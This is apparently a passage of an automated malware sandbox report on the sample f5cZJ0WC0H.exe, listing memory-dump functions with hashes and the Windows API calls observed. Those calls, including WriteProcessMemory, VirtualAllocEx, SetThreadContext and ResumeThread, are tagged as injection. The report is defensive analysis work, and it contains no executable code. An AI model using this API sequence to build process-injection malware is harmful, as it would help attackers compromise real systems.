                                                      • Instruction Fuzzy Hash: EBC17635D00109DFCB21DFA4C980C9DBBBAFF49308B208195EA59AB325DB31E995DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C50ADB, Relevance: .3, Instructions: 272COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1afc344f384ed40d9ce605adba36caa7314d8389647a1d112aa668a5d559d3ca
                                                      • Instruction ID: 13c05812ba17a338611b5a6b69f9d263912aec5cad2e633ef8e74815d989a32e
                                                      • Opcode Fuzzy Hash: 1afc344f384ed40d9ce605adba36caa7314d8389647a1d112aa668a5d559d3ca
                                                      • Instruction Fuzzy Hash: 2AC13735D00119DFCB21DFA4C984C9DBBBAFF49304B208195E919AB325DB31E995DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C50300, Relevance: .2, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4eecf029e59c1fa251eb4349155f0943ddbf4e5e46e5c8b4762e8a1cb2ba63b
                                                      • Instruction ID: b6fce16d905307f07cfa29610e89fc4c4f18ac8e61cc6dbdf5d8789fe84b8354
                                                      • Opcode Fuzzy Hash: c4eecf029e59c1fa251eb4349155f0943ddbf4e5e46e5c8b4762e8a1cb2ba63b
                                                      • Instruction Fuzzy Hash: AC718031904249DFCB01DFA4D8808DDBBB6FF4A304B15809AE915EB261D731FD56CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C50378, Relevance: .2, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c603c777cca13e0e770076d0b3a331d4e21a5d222a07d613ff1b00f0fe229804
                                                      • Instruction ID: 2ccb73f6cf0d3f84b99647b9f1e2ed44167c30b9a6f59670d753081ca0fb3d0c
                                                      • Opcode Fuzzy Hash: c603c777cca13e0e770076d0b3a331d4e21a5d222a07d613ff1b00f0fe229804
                                                      • Instruction Fuzzy Hash: 90518C35D00209DFCB11DFA8D880C9DBBB6FF4A304B1580A9E915AB261D731FD56CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C51040, Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3bfa75e510d0412a7acdf6acec85345152f22834df9ec244e9524dc1643983b
                                                      • Instruction ID: a6210ca458f69482422b6a30c7fdb3e8c3cfaf80ecc3526be34efeb4e5c397ff
                                                      • Opcode Fuzzy Hash: b3bfa75e510d0412a7acdf6acec85345152f22834df9ec244e9524dc1643983b
                                                      • Instruction Fuzzy Hash: DE51CD35D00109DFCB01EF94D884CADBBB6FF8A314B1480A6E911AB261DB31FD56CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C50000, Relevance: .1, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4e9db5bfaf332cfa57c145e0336691257dfc38b8b9462ace4a3e15874197509
                                                      • Instruction ID: 4b565f766524dae9b6dbf77b62d3c43fe049a3847a8954d0fb403e6fd08324e5
                                                      • Opcode Fuzzy Hash: c4e9db5bfaf332cfa57c145e0336691257dfc38b8b9462ace4a3e15874197509
                                                      • Instruction Fuzzy Hash: 0E51D175D0425ADFCB01DFA4D89489DBBB6FF0A300B118092E915EB372DB35AD06CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C50048, Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1bb64cb0b3b7e020d797f2223a97a29bb23f5dd86c1c9bb1d2c513977ad1656
                                                      • Instruction ID: 2d27e6027ebaff9d8a4749468108e3574573b5729c55ef7dfefc80d082d16712
                                                      • Opcode Fuzzy Hash: c1bb64cb0b3b7e020d797f2223a97a29bb23f5dd86c1c9bb1d2c513977ad1656
                                                      • Instruction Fuzzy Hash: 85519E35A0021ADFCB01DFA4D88489EBBB6FF49304B118066E915EB371DB35ED55CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C505D8, Relevance: .1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4e98cf8e88981ef7ac5bd1a484862e491dc3e0b5bfc529de90986c6568365a6
                                                      • Instruction ID: f57956325e5e106340d958117069e734a5b244c9fdf81d4c87e3f58901415018
                                                      • Opcode Fuzzy Hash: f4e98cf8e88981ef7ac5bd1a484862e491dc3e0b5bfc529de90986c6568365a6
                                                      • Instruction Fuzzy Hash: 7041F831A05205CFCB11DF59C8459AEBBF6FF89314B05806AE949EB321DB30ED84CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04C505B8, Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ccfc7f4d041e44b5ba00b25c554a286f2855f6a09ac2830b8b1eb3eb2963df6
                                                      • Instruction ID: fcc55c8409867a4bd0933e50195844bde0428a1dab21ce05fddcfe2160589605
                                                      • Opcode Fuzzy Hash: 9ccfc7f4d041e44b5ba00b25c554a286f2855f6a09ac2830b8b1eb3eb2963df6
                                                      • Instruction Fuzzy Hash: 9731B331A05205CFCB11DF69C8549AEBBF6BF85314B0580A6E849EB261DB34E985CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: f5cZJ0WC0H.exe PID: 6868 Parent PID: 3472 f5cZJ0WC0H.exeCOMMON

                                                      Executed Functions

                                                      Function 050238E3, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 05023975
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID:
                                                      • API String ID: 1778838933-0
                                                      • Opcode ID: 509cb9563a23e81b253c6b4eeae71197d986c03444e1154edf7429661339e4fd
                                                      • Instruction ID: 04237c8287ab2fd9420b379387c2b552a25f12e9ebd60c17ffc7922806c7d1ed
                                                      • Opcode Fuzzy Hash: 509cb9563a23e81b253c6b4eeae71197d986c03444e1154edf7429661339e4fd
                                                      • Instruction Fuzzy Hash: 8F21EFB1900298DFCB10CF9AD885BDEBBF4FB49314F10852AE919A7350D778A944CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 050238E8, Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 05023975
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID:
                                                      • API String ID: 1778838933-0
                                                      • Opcode ID: 1af84ebc750b417daa3d8add2e97763ba96f5a1af710f9d96713ca6947777b2c
                                                      • Instruction ID: bdf26a7103c1b1d24532ce3695c8369cc4efb5490f5e8f665178570bc7a36d21
                                                      • Opcode Fuzzy Hash: 1af84ebc750b417daa3d8add2e97763ba96f5a1af710f9d96713ca6947777b2c
                                                      • Instruction Fuzzy Hash: 6F21EFB1900258DFCB10CF9AD884BDEBBF4FB49314F10852AE919A7250D778A944CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502AA25, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502AC66
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 08b95d3450d0a75e06731821a60ab27946af5a78121be46e4bf6e58a0009a92e
                                                      • Instruction ID: fd71c8b00d20febd088164a9272a4518fe92708e4daac14c4ad7ab7f24a8a5a3
                                                      • Opcode Fuzzy Hash: 08b95d3450d0a75e06731821a60ab27946af5a78121be46e4bf6e58a0009a92e
                                                      • Instruction Fuzzy Hash: DF918D71E04229CFDF20CF68D981BEDBBB2BF48304F158569D809A7240DBB49985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502AA30, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502AC66
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6edfb55fe6a0610139a4560e1c1507a182b4fe2ff9c08e02011cb4cb30057561
                                                      • Instruction ID: 3daa1472bfddbe22b2c8f440d049bf96aae5f219f6cce69d677f458b27b8cc60
                                                      • Opcode Fuzzy Hash: 6edfb55fe6a0610139a4560e1c1507a182b4fe2ff9c08e02011cb4cb30057561
                                                      • Instruction Fuzzy Hash: 35917C71E04629CFDF20CF68D985BEDBBB2BF48304F1585A9D809A7240DBB49985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502E9D8, Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0502EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: b88bb6f062090e70c55fc3bea3d8e761e3e0ab76f206508d9427e347ebf88aae
                                                      • Instruction ID: 2f11577d61db566f4287afb1230e40aef3cd96adafbb61b4e7483dda53d62679
                                                      • Opcode Fuzzy Hash: b88bb6f062090e70c55fc3bea3d8e761e3e0ab76f206508d9427e347ebf88aae
                                                      • Instruction Fuzzy Hash: 88814570A00B158FD764CF6AE455BAAB7F6FF88204F04892ED44ADBA40D734E846CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01015364, Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01015421
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377618646.0000000001010000.00000040.00000001.sdmp, Offset: 01010000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 1086d79a7ce3ccebaad32cbdf9b8737b5b238a81cc0e7ad38eb5344eaf49e488
                                                      • Instruction ID: f8f15e848f1d43cb3fd1e681c05c8c820943586dab0e80deb7bc015831a64b40
                                                      • Opcode Fuzzy Hash: 1086d79a7ce3ccebaad32cbdf9b8737b5b238a81cc0e7ad38eb5344eaf49e488
                                                      • Instruction Fuzzy Hash: 40410271D04328CFDB14CFA9C9847DEBBB1BF89308F21816AD448AB254DB795946CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 010138A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01015421
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377618646.0000000001010000.00000040.00000001.sdmp, Offset: 01010000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 75f8434ac2aa021e98343bacdbc3b6e57a746ccc3948135c4da8212ecb70fa8a
                                                      • Instruction ID: 59729befe64b1db9657bb3319287cc809659bad0e845fc477bbe08c2306aaf0a
                                                      • Opcode Fuzzy Hash: 75f8434ac2aa021e98343bacdbc3b6e57a746ccc3948135c4da8212ecb70fa8a
                                                      • Instruction Fuzzy Hash: 4E41F271D04328CFDB24CFA9C944B9EBBB1BF89308F218059D548BB254DBB56946CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BB41, Relevance: 1.6, APIs: 1, Instructions: 87injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502BC30
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: fcfa66cf157353e490559a980e9fa7be17c9d7c068e9e76d1d17fb019ffc9b00
                                                      • Instruction ID: 76ddaabefc732f59d7a70238fe520762becc70b782eeaab4db72b3fd7f514f3d
                                                      • Opcode Fuzzy Hash: fcfa66cf157353e490559a980e9fa7be17c9d7c068e9e76d1d17fb019ffc9b00
                                                      • Instruction Fuzzy Hash: 2B315776D042489FCB00CFA9D8817EEBBF1FF48314F14846AE909A7350DB789A54DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BB98, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502BC30
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 2ea07da37e0f2985ee3c744ad4c1f54d8b8372ff8cdef1939e24d1ac362efe90
                                                      • Instruction ID: c2676ee192ed59cd1ae0beedc476963560c7db6bd56362fdd303efc5271cfdf1
                                                      • Opcode Fuzzy Hash: 2ea07da37e0f2985ee3c744ad4c1f54d8b8372ff8cdef1939e24d1ac362efe90
                                                      • Instruction Fuzzy Hash: 5F2166B5D043989FCB10CFA9C9857EEBBF1FF48314F14842AE958A7240C7789954CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BBA0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502BC30
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: cb3eca89ddf8ab8f0d10e10b044a619ee285ef19605259ce68d60a1eb6edb48b
                                                      • Instruction ID: 623ff13b38692e8d8c123c1d83cf7b38cb44cc5c53b22c3145cb71c8a673ec4d
                                                      • Opcode Fuzzy Hash: cb3eca89ddf8ab8f0d10e10b044a619ee285ef19605259ce68d60a1eb6edb48b
                                                      • Instruction Fuzzy Hash: BE2127B19043599FCF10CFA9C984BEEBBF5FF48314F10842AE959A7250C7789954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502B4D1, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0502B556
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: c2e3f92e3b85e5f940e9d7dfdf09f69df213469516a24ad7540bec2b90830a57
                                                      • Instruction ID: e0439fbc55f7e69bb76caf07dc23ccb0e00a30dea4dd303d6c76b77773986916
                                                      • Opcode Fuzzy Hash: c2e3f92e3b85e5f940e9d7dfdf09f69df213469516a24ad7540bec2b90830a57
                                                      • Instruction Fuzzy Hash: 852145719042588FCB10CFAAC4847EEBBF4EB48314F54842EE519A7240CB78A985CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502B4D8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0502B556
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: fc2bc72e6faa2db4e053e8092a06333d4c86e7dc3292e1dc90e535296efbe598
                                                      • Instruction ID: 502dff794e5a3240f41cd38357bd6de1869c822292dc5a790ffdec559e2f4a4f
                                                      • Opcode Fuzzy Hash: fc2bc72e6faa2db4e053e8092a06333d4c86e7dc3292e1dc90e535296efbe598
                                                      • Instruction Fuzzy Hash: 262123719042588FCB10CFAAC4847EEBBF4AB88364F54842ED519A7240CB78A985CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BA88, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502BB01
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 11b8453221183757da70a8933bed1da6b6c1eb036f47108067e54e834d938e84
                                                      • Instruction ID: f6af5ecc0e4a7958818abcb06ef32cecbb5b5b1ea2297f5b591244e316fc6a63
                                                      • Opcode Fuzzy Hash: 11b8453221183757da70a8933bed1da6b6c1eb036f47108067e54e834d938e84
                                                      • Instruction Fuzzy Hash: 4621E4B5C04259DFCB10CF99D884BDEBBF4FB48314F14841AE958A3600C374A544CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05022843, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 050228BB
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: f5ddd15c1b69c3e5e061c70a2417b7bb4b29be356dcd1a5bb7da2f81196173ae
                                                      • Instruction ID: 3aa119a5757e8ff1cafeff03f89c6230a983fdadf2760f65e17f9c8ebb557488
                                                      • Opcode Fuzzy Hash: f5ddd15c1b69c3e5e061c70a2417b7bb4b29be356dcd1a5bb7da2f81196173ae
                                                      • Instruction Fuzzy Hash: 492106B5D042499FCB10CF9AD884BDEBBF4FB48324F148429E958A3650D374A584CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502DDA0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0502ECA9,00000800,00000000,00000000), ref: 0502EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 8824bf127191c49afae3e39b964043d412f8cefa666624605aeb4036784e44d3
                                                      • Instruction ID: 86f7297aacfe555d75321210e5904b2af2bada3810089da2be17a5e25d84fea4
                                                      • Opcode Fuzzy Hash: 8824bf127191c49afae3e39b964043d412f8cefa666624605aeb4036784e44d3
                                                      • Instruction Fuzzy Hash: EC1103B2D042589FDB10CF9AD444AEEFBF9FB48324F04842EE915A7600C374A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BC89, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 9d0be2e3ce2df324b83b75b3fa870c1498a143df51119cf5cea5cfd805a06422
                                                      • Instruction ID: fcbf72e39d4a4fcd3440da95ac655fcb64edf965f5b32b4a9c7ade82d6e6fb71
                                                      • Opcode Fuzzy Hash: 9d0be2e3ce2df324b83b75b3fa870c1498a143df51119cf5cea5cfd805a06422
                                                      • Instruction Fuzzy Hash: 901156728042489FCB10CFAAD844BEEBBF5EF88324F148819E519A7250C779A954CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05022848, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 050228BB
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 467da3e6f067a965de40614bfc2a0b72b0a97a051e0b6eaca2d6ddebb8ddace9
                                                      • Instruction ID: f70d9132aa8a7ef9a7295d99a8e6a0733c899a1a0bb4acc77a9c916b2a700f7b
                                                      • Opcode Fuzzy Hash: 467da3e6f067a965de40614bfc2a0b72b0a97a051e0b6eaca2d6ddebb8ddace9
                                                      • Instruction Fuzzy Hash: E32106B5D042499FCB10CF9AC484BDEBBF4FB48324F108429E958A3650D374A544CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BA90, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502BB01
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 4f0bf153d9dd17c4ca585bb2e3adb59f2ff2848c5ba15e0f879a7db928a752f8
                                                      • Instruction ID: 03bc3f2715ddc8eb3a45a88d4741af9f7d3febe6be7dc072d725413a6b18ef94
                                                      • Opcode Fuzzy Hash: 4f0bf153d9dd17c4ca585bb2e3adb59f2ff2848c5ba15e0f879a7db928a752f8
                                                      • Instruction Fuzzy Hash: 0821C3B5D043599FDB10CF9AD884BEEBBF8FB48324F10842AE958A3610C374A544CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BC90, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: c9cb588abb4752d443c3853ae69ceb5ee03c804860bb9e3af7b230f5644eb158
                                                      • Instruction ID: 5ade0f34696274018d33629675bc340e30b5a91b1134286c1cd027d53072588a
                                                      • Opcode Fuzzy Hash: c9cb588abb4752d443c3853ae69ceb5ee03c804860bb9e3af7b230f5644eb158
                                                      • Instruction Fuzzy Hash: 591167718042489FCB10CFAAC844BEFBBF5EF48324F148819E519A7250C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502EE2A, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0502ECA9,00000800,00000000,00000000), ref: 0502EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 29e9c5a8a64b6e40bb1d6e224027457748bf9868ed1b5d5f5f0dd119193bc84a
                                                      • Instruction ID: 81548a5c4ffb0f2455f129ac054ad81b1d2d904aa4add37a34c6922b513596a0
                                                      • Opcode Fuzzy Hash: 29e9c5a8a64b6e40bb1d6e224027457748bf9868ed1b5d5f5f0dd119193bc84a
                                                      • Instruction Fuzzy Hash: C41103B2C042588FDB10CF9AD444AEEFBF8FB48324F05841AE515A7600C374A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BF40, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 53d8dad4407d96d63945021a6ff6b118b7ae2a078c45652b9d37e6528ae0c7c0
                                                      • Instruction ID: 7b549e5df145cb0053df4c935a0b2dc837251459a2e3faae53969f85e2eb6f44
                                                      • Opcode Fuzzy Hash: 53d8dad4407d96d63945021a6ff6b118b7ae2a078c45652b9d37e6528ae0c7c0
                                                      • Instruction Fuzzy Hash: 221146B19083588BCB10DFAAC8457EEBBF5EF88324F14842AD519B7640C778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502BF48, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 82f7fc20c4ad93a5d240ea0220cb4e96688e3903f487afc0c6d32a39a5f07219
                                                      • Instruction ID: 1823f1c5d2fac30dc4d59b5dd9a4df4f4e3145af6e144553e181d982d767c189
                                                      • Opcode Fuzzy Hash: 82f7fc20c4ad93a5d240ea0220cb4e96688e3903f487afc0c6d32a39a5f07219
                                                      • Instruction Fuzzy Hash: DC1125B1D083588BCB10DFAAC8457EEBBF5AF88228F15841AD519A7640CB74A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0502EBC8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0502EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
